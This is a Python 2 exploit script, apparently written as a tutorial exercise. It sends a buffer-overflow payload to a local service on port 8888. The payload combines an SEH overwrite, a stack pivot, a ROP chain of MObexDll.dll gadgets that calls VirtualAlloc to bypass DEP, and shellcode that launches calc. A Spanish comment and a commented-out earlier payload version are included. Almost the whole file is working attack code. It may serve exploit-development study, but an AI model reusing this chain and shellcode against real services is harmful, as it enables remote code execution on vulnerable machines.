import socket
import struct


import random, string

def randomword(length):
    return ''.join(random.choice(string.lowercase) for i in range(length))

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 8888))

shellcode="\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"

rop_gadgets = [

    0x7801c98b,  # POP EAX # RETN [MObexDll.dll]
    0x7802e0b0,  # ptr to &VirtualAlloc() [IAT MObexDll.dll]
    0x7801239a,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MObexDll.dll]
    0x78009aab,  # PUSH EAX # ADD AL,5F # POP ESI # RETN [MObexDll.dll]
    0x78002d10,  # POP EBP # RETN [MObexDll.dll]
    0x7800f7c1,  # & push esp # ret  [MObexDll.dll]
    0x78010b50,  # POP EBX # RETN [MObexDll.dll]
    0x00000001,  # 0x00000001-> ebx
    0x7802c35d,  # POP EDX # RETN [MObexDll.dll]
    0x00001000,  # 0x00001000-> edx
    0x7800320f,  # POP ECX # RETN [MObexDll.dll]
    0x00000040,  # 0x00000040-> ecx
    0x78015003,  # POP EDI # RETN [MObexDll.dll]
    0x7800b281,  # RETN (ROP NOP) [MObexDll.dll]
    0x7801c934,  # POP EAX # RETN [MObexDll.dll]
    0x90909090,  # nop
    0x78009791,  # PUSHAD # ADD AL,80 # RETN [MObexDll.dll]
]
rop= ''.join(struct.pack('<I', _) for _ in rop_gadgets)

randomstr=randomword(0x5000)
print randomstr

seh=seh=struct.pack("<L", 0x7800AEAF )
xchg=struct.pack("<L", 0x78014E40 )
jmp = struct.pack("<L", 0x7800A393)
ret= struct.pack("<L", 0x7800b281)
writable=struct.pack("<L", 0x78035010) #esto no estaba en el video pero lo agregue es para que no se rompa en el gadget cuando mueve a esp en MObexDll.dll:7800AEC6 mov     esp, [ebx+1Ch] y que ESP quede apuntando a una direccion escribible hasta que luego con el XCHG acomode el stack de nuevo
size=struct.pack("<L", 0xffffffff)
fruta=struct.pack("<L", 0xfefefefe)+ struct.pack("<L", 0x01010101)+ size + (4856-4) * "A"+ jmp + seh + 16*"B" + xchg + writable+20*ret + rop +shellcode


sock.send(fruta)
sock.close()



















#
#
#
#
#
#

#
# rndstr=randomword(0x5000)
# print "%r"%rndstr
#
# rndstr2=randomword(4856)
# print "%r"%rndstr2
#
#
#
# seh=struct.pack("<L", 0x7800AEAF )
# xchg=struct.pack("<L", 0x78014E40 )
#
# fruta= struct.pack("<L",0xFEFEFEFE) + struct.pack("<L",0x01010101)+ struct.pack("<L",0xffff13e0) + rndstr2 + seh + 16* "A" +xchg+ rndstr
# a=sock.recv(512)